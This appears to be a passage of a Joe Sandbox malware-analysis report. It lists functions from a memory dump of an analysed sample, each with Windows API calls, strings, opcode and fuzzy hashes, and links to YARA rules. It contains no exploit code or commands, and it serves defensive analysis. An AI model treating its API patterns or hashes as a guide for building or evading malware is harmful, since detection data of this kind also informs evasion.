API String ID: 1413079979-0
Opcode ID: 2ac1cf5dc52ceeaaa573f8e60c0180d1e71d96f6dcb1ad05e7d7e3200171cc87
Instruction ID: 6d8ba7afc2439370a7ee5dab8bb09fb2fa5f627cf825825b41079d25e7fe60b7
Opcode Fuzzy Hash: 2ac1cf5dc52ceeaaa573f8e60c0180d1e71d96f6dcb1ad05e7d7e3200171cc87
Instruction Fuzzy Hash: 04114476500249EBDB12DFA8DD89BDE7BA9FB48704F484025FA06A6160C371CE619B70

Function 00D73382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D73379,00D72FE5), ref: 00D73390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D7339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D733B7
SetLastError.KERNEL32(00000000,?,00D73379,00D72FE5), ref: 00D73409

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 57bbdc4b91c8d55767680b15baa498f162ef464b6ea40b3466d070efa3f781b3
Instruction ID: b86bc634accfd5391748dbe039e8b2b24ae9e1fbd1c5af735d31f448cca1b7da
Opcode Fuzzy Hash: 57bbdc4b91c8d55767680b15baa498f162ef464b6ea40b3466d070efa3f781b3
Instruction Fuzzy Hash: 61012432248311BEA7253BB9BC859AB2A95EB09379330C22AF418D42F0FF114D067674

Function 00D82D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D85686,00D93CD6,?,00000000,?,00D85B6A,?,?,?,?,?,00D7E6D1,?,00E18A48), ref: 00D82D78
_free.LIBCMT ref: 00D82DAB
_free.LIBCMT ref: 00D82DD3
SetLastError.KERNEL32(00000000,?,?,?,?,00D7E6D1,?,00E18A48,00000010,00D54F4A,?,?,00000000,00D93CD6), ref: 00D82DE0
SetLastError.KERNEL32(00000000,?,?,?,?,00D7E6D1,?,00E18A48,00000010,00D54F4A,?,?,00000000,00D93CD6), ref: 00D82DEC
_abort.LIBCMT ref: 00D82DF2

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: ad1193525d78dcba51750cdc4828ff2d62076015fc72b0bede20c0858eefcb53
Instruction ID: f6fa67f2cd784dcadd1990afb987f326d56ae261fc52fbce2ed4cf61e5092ceb
Opcode Fuzzy Hash: ad1193525d78dcba51750cdc4828ff2d62076015fc72b0bede20c0858eefcb53
Instruction Fuzzy Hash: 71F0C8366856003BC6123739BC06F7B2969EFC17B1F294418F828E62D2EF249C0243B1

Function 00DE8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00D69639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D69693
Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696A2
Part of subcall function 00D69639: BeginPath.GDI32(?), ref: 00D696B9
Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00DE8A4E
LineTo.GDI32(?,00000003,00000000), ref: 00DE8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00DE8A70
LineTo.GDI32(?,00000000,00000003), ref: 00DE8A80
EndPath.GDI32(?), ref: 00DE8A90
StrokePath.GDI32(?), ref: 00DE8AA0

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 5efcc055334c31b720025aa8afbb8e8652555319ac17a8a60f275714a52f1682
Instruction ID: 4bf4a8a8fec615512121e4c1096208dfbe5f6e6ddb5ede030c052c1881bd463e
Opcode Fuzzy Hash: 5efcc055334c31b720025aa8afbb8e8652555319ac17a8a60f275714a52f1682
Instruction Fuzzy Hash: 6411CC7600024DFFDF12AF95DC88E9A7F6DEB04394F048061FA199A1A1C7719D56DB70

Function 00DB51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00DB5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00DB5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DB5230
ReleaseDC.USER32(00000000,00000000), ref: 00DB5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DB524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00DB5261

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 18bcefe779b29594ed870ba54a04b528066dcceccea1f5fb3a67bce6ae753618
Instruction ID: 7f7a6be6e57aa957241e18ff035c2892612b40cb8bea637d1ef6f4363f9ae360
Opcode Fuzzy Hash: 18bcefe779b29594ed870ba54a04b528066dcceccea1f5fb3a67bce6ae753618
Instruction Fuzzy Hash: 7B014F75A01758BBEB10ABE59C89B5EBFB8EF48751F044065FA05EB391D6709801CBB0

Function 00D51BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D51BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00D51BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D51C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D51C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00D51C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D51C22

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: f4fc85c5f26ba173bc0708e0de38a98ffa07f2743613ae66ce0bc216e8b5df2a
Instruction ID: f03dbf30139d0e57485b2dfbe905839d25bb5307e4ab85e6775e634c6c0e3cf0
Opcode Fuzzy Hash: f4fc85c5f26ba173bc0708e0de38a98ffa07f2743613ae66ce0bc216e8b5df2a
Instruction Fuzzy Hash: D30148B09027597DE3009F5A8C85A52FFA8FF19354F00411B915C4BA41C7B5A864CBE5

Function 00DBEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DBEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DBEB46
GetWindowThreadProcessId.USER32(?,?), ref: 00DBEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DBEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DBEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DBEB75

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: d9789e6e2e557c06deb8a99188b70e754bdabcae1f583374d269b6e31034f6d7
Instruction ID: 6b1edd5d2cfc6fa19c8e09ea2c6dbdec65b28d62c615377d63a4ac0a648526ef
Opcode Fuzzy Hash: d9789e6e2e557c06deb8a99188b70e754bdabcae1f583374d269b6e31034f6d7
Instruction Fuzzy Hash: ACF03072250298BBE72167529C4DEEF3A7CEFCAB11F001158FA01D5291D7A05A02C6B5

Function 00DA7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00DA7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00DA7469
GetWindowDC.USER32(?), ref: 00DA7475
GetPixel.GDI32(00000000,?,?), ref: 00DA7484
ReleaseDC.USER32(?,00000000), ref: 00DA7496
GetSysColor.USER32(00000005), ref: 00DA74B0

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: ec06db0e3f472a5d7fcc302ec95b7a17cdb960f72969165c5560e4562d7d8b58
Instruction ID: fd0d55d464a83bb6a9fe1f110167dae4a969779da037048c513a8612deb20cfb
Opcode Fuzzy Hash: ec06db0e3f472a5d7fcc302ec95b7a17cdb960f72969165c5560e4562d7d8b58
Instruction Fuzzy Hash: AF018B31410355EFDB116F64DC48BAA7BB5FB08311F151064F926E62B0CB311E42AB60

Function 00DB1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DB187F
UnloadUserProfile.USERENV(?,?), ref: 00DB188B
CloseHandle.KERNEL32(?), ref: 00DB1894
CloseHandle.KERNEL32(?), ref: 00DB189C
GetProcessHeap.KERNEL32(00000000,?), ref: 00DB18A5
HeapFree.KERNEL32(00000000), ref: 00DB18AC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 761852c8a8131691403da7539b06a3da4e743fa896ecfca9fb5374e8d3f69b66
Instruction ID: 8e28fc2a87a02343fe6da69b2b22bb8e9059336aae1d8882541a0adc3877557a
Opcode Fuzzy Hash: 761852c8a8131691403da7539b06a3da4e743fa896ecfca9fb5374e8d3f69b66
Instruction Fuzzy Hash: 95E0C236114341BBDB016BA1ED4C90ABB29FB5AB22B909220F625C9270CB329422DB70

Function 00D5BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00D5BEB3

Strings

D%, xrefs: 00D5BE9A
D%, xrefs: 00D5BCA5
D%, xrefs: 00D5BDED, 00D5BD91, 00D5BD1B
D%, xrefs: 00D5BCA2

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%$D%$D%$D%
API String ID: 1385522511-2722557190
Opcode ID: 4485cd63973966fcbb44f448ae117aacd324dc70b1e00a0fe8bf4349a05e087a
Instruction ID: 9c97b68d7b93915b660e06c9e6f4015bf35db884f8760c5a71de2a58c352e6fe
Opcode Fuzzy Hash: 4485cd63973966fcbb44f448ae117aacd324dc70b1e00a0fe8bf4349a05e087a
Instruction Fuzzy Hash: C8910975A0020ADFCF14CF69C0916B9B7F1FF58321B28815AED95AB351D731E985CBA0

Function 00DBC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DBC6EE
_wcslen.LIBCMT ref: 00DBC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DBC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DBC7CA

Strings

0, xrefs: 00DBC6AF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: bbf47bd260c2cbc0bb15fdef41a961914f6cafb3443a3bdc0e46c7b6b452d081
Instruction ID: f20d77fd4f5c9dd31f163c18512b2d6329827932b1c312504f6a12c2a85375bd
Opcode Fuzzy Hash: bbf47bd260c2cbc0bb15fdef41a961914f6cafb3443a3bdc0e46c7b6b452d081
Instruction Fuzzy Hash: 9651C371624340DBD7149F28D885AAB77E4FF89310F08292DF996D31A0DB60D904CB72

Function 00DB719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00DB7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DB723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DB724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DB72CF

Strings

DllGetClassObject, xrefs: 00DB7242

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 52cf3eefa59a64d219fccbc203686c7995c57010c585ed9f45985be34f5250fc
Instruction ID: afea03b3b8c9169df2a6017ec35c59fbfff85591dc8b20762439b0696d7b07bd
Opcode Fuzzy Hash: 52cf3eefa59a64d219fccbc203686c7995c57010c585ed9f45985be34f5250fc
Instruction Fuzzy Hash: CB415D71A04204EFDB15DF64C884ADA7BA9EF84310F1480ADBD069F20AD7B1DA45CBB4

Function 00DE3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DE3E35
IsMenu.USER32(?), ref: 00DE3E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DE3E92
DrawMenuBar.USER32 ref: 00DE3EA5

Strings

0, xrefs: 00DE3D89

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 0f2c94b9dc5f8f822fb3d9632f83ef4dda9e7e84c4a0506c949fd02ecf904f31
Instruction ID: cf0296bafb8721ba5351d165345f77e23911ed5f2cea3491ceaad07b131f0baa
Opcode Fuzzy Hash: 0f2c94b9dc5f8f822fb3d9632f83ef4dda9e7e84c4a0506c949fd02ecf904f31
Instruction Fuzzy Hash: 25415BB5A00289AFDB14EF51D888AAAB7B5FF45754F084219F905AB350D730EE45CF60

Function 00DB1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00DB1E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00DB1E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00DB1EA9

Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A

Strings

ListBox, xrefs: 00DB1E25
ComboBox, xrefs: 00DB1DF0

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: a7276f40bc3b2d4008c1513fab6ab5f08667fc308f8706d75c242818aa7e4401
Instruction ID: d75c0444df47e4eaa223c3dae392ea993d2f4e8c40ab6f4bce2496d151fd89d2
Opcode Fuzzy Hash: a7276f40bc3b2d4008c1513fab6ab5f08667fc308f8706d75c242818aa7e4401
Instruction Fuzzy Hash: 9D216675A00244FFDB14ABA4DCA6CFFBBB9EF51350B544119FC26A72E1DB34890A8630

Function 00DE2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DE2F8D
LoadLibraryW.KERNEL32(?), ref: 00DE2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DE2FA9
DestroyWindow.USER32(?), ref: 00DE2FB1

Strings

SysAnimate32, xrefs: 00DE2F68

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: a3a9ab88ca4378501acb21d143af1e08df97dcc874560a4b68f2a344ca05e0af
Instruction ID: 07c5deed6121d682292ea439807b388ef6cf468c74f8231dd755a9c13141b22e
Opcode Fuzzy Hash: a3a9ab88ca4378501acb21d143af1e08df97dcc874560a4b68f2a344ca05e0af
Instruction Fuzzy Hash: 2421AC72600285ABEB206F66DC81FBB37BDEF59368F140228FA50D61A0D771DC919770

Function 00D74D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D74D1E,00D828E9,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002), ref: 00D74D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D74DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00D74D1E,00D828E9,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002,00000000), ref: 00D74DC3

Strings

CorExitProcess, xrefs: 00D74D98
mscoree.dll, xrefs: 00D74D86

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e18c5c4fe2d0d3340e84fdb32c090d30426aa49f16b709f4b77d9d755b903472
Instruction ID: 9039570f2c502211f6059a67171bb205af8ea0e286ed277d6a14191c853de6e6
Opcode Fuzzy Hash: e18c5c4fe2d0d3340e84fdb32c090d30426aa49f16b709f4b77d9d755b903472
Instruction Fuzzy Hash: 0AF03134550358AFDB116F90DC49BADBFB5EB44751F054094A90DE6250DB305945CAA0

Function 00DAD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00DAD3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DAD3BF
FreeLibrary.KERNEL32(00000000), ref: 00DAD3E5

Strings

X64, xrefs: 00DAD2A8
GetSystemWow64DirectoryW, xrefs: 00DAD3B9

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 877c91f7298e537bbe44e1c2dc0f32a448e56f7f3a58cf77cccb0bdf0fd29497
